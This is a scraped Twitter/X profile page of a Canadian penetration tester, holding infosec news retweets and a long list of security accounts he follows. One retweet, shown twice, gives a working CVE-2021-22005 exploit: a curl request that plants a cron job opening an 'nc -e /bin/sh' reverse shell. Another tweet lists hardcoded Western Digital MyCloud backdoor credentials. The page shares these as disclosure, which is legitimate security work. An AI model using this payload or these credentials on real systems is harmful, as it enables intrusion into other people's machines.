Nicholas Charron @n_charron
Pentester & Red Teamer. Breaking things. Hockey. Fishing. Outdoors. Not always in that order. Canada Joined May 2009-
Tweets331
-
Followers164
-
Following304
-
Likes321
🇨🇦 DO NOT LET CANADA BAN SOFTWARE-DEFINED RADIOS!📻 A friend and I wrote an open letter to François-Philippe Champagne, Minister of Innovation, Science and Industry. You can read it at SaveFlipper.com PLEASE re-share it, repost about it on other social networks
Curious as to the origin story of the Microsoft bug bounty? Read the @LutaSecurity blog about the beginning of Microsoft’s #bugbounty, now all grown up: lutasecurity.com/post/celebrati… Thanks for the official recognition on the @msftsecresponse 10 year anniversary blog @nchlgpt 🙌🏼✨
Curious as to the origin story of the Microsoft bug bounty? Read the @LutaSecurity blog about the beginning of Microsoft’s #bugbounty, now all grown up: lutasecurity.com/post/celebrati… Thanks for the official recognition on the @msftsecresponse 10 year anniversary blog @nchlgpt 🙌🏼✨
Disclosed today at @Disobey_fi - psexec from #impacket expose the target system for authenticated command execution as SYSTEM. That means any user that can authenticate over the network (usually Domain Users) can run code as SYSTEM over the network.
🚨We released an ESXiArgs ransomware recovery script on GitHub to allow organizations to attempt recovery of virtual machines affected by the ESXiArgs ransomware attacks: github.com/cisagov/ESXiAr… #StopRansomware
GoSecure ethical hackers found a bug in MySQL that left AWS WAF users vulnerable to SQL injection. Our team further confirmed modsecurity to be affected, but protection is within reach as described in the blog. gosecure.net/blog/2021/10/1… #appsec #sqli
📡 Infosec friends, a reeeeally interesting project just landed on my lap. If you know good BLE hackers, DM & send them my way.
CVE-2021-22005: Exploitation in the wild confirmed. Unredacted RCE PoC against CEIP below. curl -kv "https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh 172.16.57.1 4444"
CVE-2021-22005: Exploitation in the wild confirmed. Unredacted RCE PoC against CEIP below. curl -kv "https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh 172.16.57.1 4444" https://t.co/bwjMA21ifA
Message for infosec professionals at #AtlSecCon : if you have time, help some research by visiting cybersecuritysurvey.org . Input is anonymous and results will be shared openly with the community 😮 #bettersecuritytogether #opensource
Live Views of Starman pscp.tv/w/bUjQEDFyYVFa…
The emergency worker who sent a false nuclear attack alert in Hawaii believed that a missile was truly bound for the state wapo.st/2BERKfA
Can't. wait. until. April.
If you have/use any Western Digital MyCloud drives, recommend disconnecting them immediately and transitioning the data to another product ASAP -Hardwired network backdoor (u: mydlinkBRionyg p: abc12345cba) no vendor response for six months. goo.gl/9hyREs
Pro tip: You can log into macOS High Sierra as root with no password reg.cx/2vyD
This is not what InfoSec meant when it said we need to get rid of passwords. #iAmRoot
Uber paid hackers $100,000 to delete stolen data and keep quiet bloom.bg/2BdWppY
Revealing the first 8 teams, recognize your team? Retweet! #Symantec416

Sarshi @Sarshi836927
91 Followers 4K Following ✨ Professional daydreamer with a PhD in overthinking 🌙✨
Desirae @desirae_morgan1
363 Followers 3K Following
Udayveer Singh @m4lici0u5
2K Followers 4K Following Offensive Security | Red Teamer | Learning MalDev | CARTP | CRTL | OSEP | OSWP | CRTO | CARTP | CRTE | CRTP | CESP-ADCS | eJPT
OpheliaBennett @30LvD35QPd4MXa2
25 Followers 2K Following
Justin Elze @HackingLZ
65K Followers 5K Following CTO @TrustedSec | Former Optiv/SecureWorks/Accuvant Labs/Redspin | Race cars
CrowdCyber 🌐 @CrowdCyber_Com
275 Followers 1K Following The idea is to create big opportunities in Cybersecurity. Meanwhile we’re Revolutionizing and Democratizing Cybersecurity information.
Mackenzie @mackenzie_demmo
341 Followers 3K Following
wvu @wvuuuuuuuuuuuuu
6K Followers 2K Following Sentient one-liner grepping the Internet for signs of intelligence. VulnCheck. Previously Atredis, Rapid7 vuln research, and Metasploit.
Ahmed Tariq @AhmedTariQO
10 Followers 345 Following
kreep @kreepsec
154 Followers 266 Following Red Team 📕, Windows 🪟, Maldev 🦠 If people didn't write bad code, I wouldn't have a job.
Bruno Martins @thyskorzen
198 Followers 3K Following European. Metalhead. IT enthusiast. Creative thinker. Two-time champion. 💚 Opinions are my own.
Jon Shapransky @Jon_Shapransky
215 Followers 388 Following
Rob Fuller @mubix
79K Followers 25K Following Dad / Husband / Marine / Student / Teacher / @Hak5 / @NoVAHackers / @SiliconHBO / @NationalCCDC / @MARFORCYBER Auxiliary
Patrick Davidson Trem... @HPxpat
464 Followers 2K Following Red Team Lead - Any sufficiently advanced persistent threat is indistinguishable from magic.
Greg Valley @GregValleyNFT
72 Followers 253 Following Lawyer. Executive consultant. IRL Strategist. love Harley Davidson. Photography. Learning Crypto and NFTs . #IAMGREG
@[email protected]... @1njection
8K Followers 4K Following Focused on hacking! Check out my new book on real-time computer conflict and deception below
@[email protected]... @pathetiq
3K Followers 1K Following @hackfest_ca owner/co-founder / Hacker / Head of AppSec Team at Redacted / Podcast: @securitepodcast / Tweets are my own
rappua @abhiuppar
106 Followers 1K Following Tennis, Research and Life in general are complicated...
Anne-Marie @AnneMar68044768
54 Followers 2K Following
Sprott School of Busi... @SprottSchool
3K Followers 1K Following The official X account for the Carleton University's Sprott School of Business in Ottawa, Canada.
William Cook @notaciso
942 Followers 4K Following IT - Prevention (it's not everything tho...) // (Cyber) Security is a Lifestyle // I(N/S)TP // Blue tempered via Red hardening
Jeff (VE1OBI) @Obihan... @ObiHann
750 Followers 598 Following Dad, Husband, Recovering Developer, Security Engineer, Blood Type is Maple Syrup 0FFD4C0BFD13AA81ED15C543AC4BC93B20388632
Ryan Thompson @RyanTho41766722
345 Followers 2K Following Ambitious business development and customer success manager at @Apriorit. Excited by the potential of technology. #reverseengineering #Python #blockchain #ML
Emma - OSCP student �... @EmmaOSCP
19 Followers 269 Following Studying for OSCP. Penetration Tester wannabe. Pink Team. Hack the Universe.
Philippe Arteau @h3xstream
3K Followers 216 Following Security Researcher, interested in web security, crypto, pentest, static analysis but most of all, samy is my hero.
Kryptera @krypteratweets
318 Followers 2K Following The Server is the Key – the world's first high speed mass encryption appliances - encrypt multiple files without key management – HyperSymmetric!
Sentient Bunny Suit�... @SentientSuit
2K Followers 4K Following Hyperbole expert. Humor, Cryptography, Infosec, Pentesting, lockpicking. CISSP.
ptkrm @ptkrm
362 Followers 5K Following Streaming through the R.A.D.I.O, Dancing all around, Spread the word in S.T.E.R.E.O, All the speed of sound | infosec and stuff
r3dacted @realgagetaylor
73 Followers 305 Following
Geoffrey Vaughan @mrvaughan
3K Followers 2K Following Application Security Engineer currently coaching the next generation of hackers. Tweets are my own.
Dystopian Reading @butlermatt
497 Followers 4K Following
Norbert Griffin @norbert_griffin
355 Followers 488 Following Dad & husband first, security enthusiast. Balancing life with purpose. Active in Security BSides community.
Aman Kumar @AmancoolSam
189 Followers 2K Following Security Researchers - CRTO || CRTP || OSCP || CEH
MalDev Academy @MalDevAcademy
17K Followers 5 Following Providing specialized, module-based security training and resources designed for cyber security professionals
Aura @SecurityAura
6K Followers 654 Following GCIH, GCFE, GDAT | DFIR, TH, DE | @CuratedIntel DFIR https://t.co/BMWUwziTLh https://t.co/MmX2YNVqdk https://t.co/R20zseQfLk
Grifter @Grifter801
19K Followers 537 Following Threat Hunting & DFIR, Hacker, Geek, DEF CON & Black Hat CFP Review Board Member, DEF CON Contest/Events/Demo Labs Dept. Head, Black Hat Staff, DC801 Founder
Deviant Ollam ツ @deviantollam
45K Followers 997 Following Stalwart defender of Oxford commas, two spaces after a period, and ellipses. When they ask how I died, tell them... still happy. (he/they)
pry0cc @pry0cc
30K Followers 1K Following
Max_Malyutin @Max_Mal_
13K Followers 309 Following Threat Researcher, Blue Team, DFIR, Malware Analysis, and Reverse Engineering. “⚔️What do we say to God of malware, Not today⚔️”
nyxgeek @nyxgeek
7K Followers 3K Following rebel scum, nerfherder, dogged and relentless. H/P/V/A/C Directory - https://t.co/qn0D9H7IIi
t1v0 @_t1v0_
338 Followers 174 Following Pen tester, security geek. PvJ red team guy, Defcon black badge winner (IoT CTF). Founder of Loudmouth Security and co-founder of Village Idiot Labs.
SinSinology @SinSinology
12K Followers 685 Following Pwn2Own 20{22,23,24,24.5,25,25.5}, i look for 0-Days but i find N-Days & i chase oranges 🍊
Dark Web Informer @DarkWebInformer
132K Followers 57 Following Providing intel from the Dark Web & Clearnet: Breaches, Ransomware, Darknet Markets, Threats & more. Follow the X Bot: @DarkWebIntelBot. https://t.co/Fi7VW9lg94
IVRE @IvreRocks
1K Followers 401 Following Open-source #network recon framework. Relies on @nmap, Masscan, @zeekurity, @pdiscoveryio, p0f, …. #OSINT #redteam #blueteam #bugbounty @[email protected]
JS0N Haddix @Jhaddix
167K Followers 7K Following CEO, CISO, Trainer, Hacker, and Speaker. Cybersecurity + Hacking + AI + Sec Leadership @arcanuminfosec
Saar Amar @AmarSaar
19K Followers 361 Following Reversing, exploits, {Windows, Hyper-V, *OS} internals, mitigations. Apple SEAR. Opinions are my own. @[email protected]
Wim Remes TR @wimremes
17K Followers 3K Following Information Security - People Person - BBQ and general food Amateur - Kindness scales! - Ubukhulu Abubangwa - Building Security You Love
Kostas @Kostastsale
18K Followers 367 Following @TheDFIRReport | No longer active here – find me on Bluesky: https://t.co/qHzDSxCRfG. 🇬🇷🇨🇦
Nicolas Krassas @Dinosn
147K Followers 735 Following Head of Threat & Vulnerability Mgmt @ Henkel AG & Co. KGaA https://t.co/NC1orlKrW3
RedTeam Pentesting @RedTeamPT
8K Followers 174 Following Official RedTeam Pentesting GmbH account -- Impressum: https://t.co/pS9oK62Lsu
SwiftOnSecurity @SwiftOnSecurity
405K Followers 9K Following computer security person. former helpdesk.
Tom Hegel @TomHegel
7K Followers 777 Following Threat Research Lead @SentinelOne, Advisor with @ValidinLLC
Aleksandar Milenkoski @milenkowski
2K Followers 588 Following Threat Research | Threat Intelligence | PhD | European Commission Marie Curie Research Fellow 2011-2014 | Personal Profile | 🇩🇪
Will @BushidoToken
36K Followers 3K Following Senior Threat Intel Advisor @TeamCymru | Co-founder @CuratedIntel | Co-author @SANSForensics FOR589 | Co-founder @BSidesBournemth | @darknetdiaries #126: REvil
Jazi @h2jazi
8K Followers 529 Following Threat Intel researcher! Technical tweets only; not reflective of employer's views. No endorsement of political groups/entities.
Alexandre Borges @ale_sp_brazil
28K Followers 147 Following Vulnerability Researcher and Exploit Developer
Kyle Ehmke @kyleehmke
5K Followers 311 Following Threat intel researcher focused on infrastructure hunting. Views are my own and not my employer's. Others: @[email protected] @kyleehmke.bsky.social
hasherezade @hasherezade
89K Followers 910 Following Programmer, #malware analyst. Author of #PEbear, #PEsieve, #TinyTracer. Private account. All opinions expressed here are mine only (not of my employer etc)
Moloch @LittleJoeTables
5K Followers 641 Following Offsec at OpenAI Formerly of @BishopFox https://t.co/YcsVLOe1EL https://t.co/z3UKx3VEBH
🇺🇦 Nate Warfiel... @n0x08
14K Followers 2K Following Hacker | WIRED25 2020 | Drum&Bass DJ | https://t.co/Aa7tIdCdrM
Silas Cutler (p1nk) @silascutler
13K Followers 2K Following You may know me from your logs Research @Censys Advisor #DEVSEC Built @Only_Scans, @mal_share, #KeyDrop
Paul Rascagnères @r00tbsd
17K Followers 2K Following Lord of Loaders at @Volexity | Mastodon account: 🐘 @[email protected] | Bsky @r00tbsd.bsky.social
Alex Matrosov @matrosov
19K Followers 2K Following 🔬Founder & CEO @Binarly_io, #codeXplorer, #efiXplorer, @REhints and "Rootkits and Bootkits" book. Previously worked at Nvidia, Cylance, Intel, ESET, Yandex.
Cas van Cooten @chvancooten
10K Followers 673 Following Benevolently malicious offensive security enthusiast || OffSec Developer & Malware Linguist || NimPlant & NimPackt author || @ABNAMRO Red Team
Dirk-jan @_dirkjan
29K Followers 206 Following Hacker at @OutsiderSec. Researches AD and Azure (AD) security. Likes to play around with Python and write tools that make work easier.
Melvin langvik @Flangvik
11K Followers 516 Following Red Team @TrustedSec , terrible creator of InfoSec content 📹Opinions are my own and not the views of my employer.
sn🥶vvcr💥sh @snovvcrash
12K Followers 490 Following Sr. Penetration Tester / Red Team Operator @ptswarm :: Author of the Pentester’s Promiscuous Notebook :: He/him :: Tweets’re my pwn 🐣
mgeeky | Mariusz Bana... @mariuszbit
14K Followers 823 Following 🔴 Operator, Initial Access afficionado, Researcher, ex-AV engine developer, ex-Malware analyst 🦋 @mgeeky.bsky.social 🫖 green tea lover
Matt Eidelberg @Tyl0us
6K Followers 273 Following Red Teamer @BHinfoSecurity. Implant Dev is my passion. Part-time Comic Book Nerd.
James Forshaw @tiraniddo
49K Followers 339 Following Security researcher in Google Project Zero. Author of Attacking Network Protocols. Tweets are my own etc. Mastodon: @[email protected]
Georgi Gerganov @ggerganov
52K Followers 289 Following 24th at the Electrica puzzle challenge | https://t.co/baTQS2bdia
Will Dormann is on Ma... @wdormann
26K Followers 1K Following I play with vulnerabilities and exploits. I used to be here on Twitter but now I'm here: @[email protected] https://t.co/hXggdAVkSQ
MDSec @MDSecLabs
15K Followers 0 Following Consultancy and Training from a trusted supplier of offensive security. Red Team and Adversary Simulation by ActiveBreach team | https://t.co/fqpbJ9WDXD | https://t.co/UvOhGA4Zou
FiestaCon @FiestaCon_RT
134 Followers 4 Following Red Team Conference for Red Teamers. Internal and consultant red teams welcome to this select community.
Dominic Chell 👻 @domchell
18K Followers 541 Following Just your friendly neighbourhood red teamer @MDSecLabs | Creator of /r/redteamsec | https://t.co/3k3EBAZqGd | https://t.co/KwO2OwDOkl
ramsexy @plmaltais
8K Followers 755 Following French-Canadian hacker 🇨🇦 Full-time bug bounty hunter 🐛💥 Strava Local Legend 🏃♂️💨 Surfing the web and hacking the waves 🌊🏄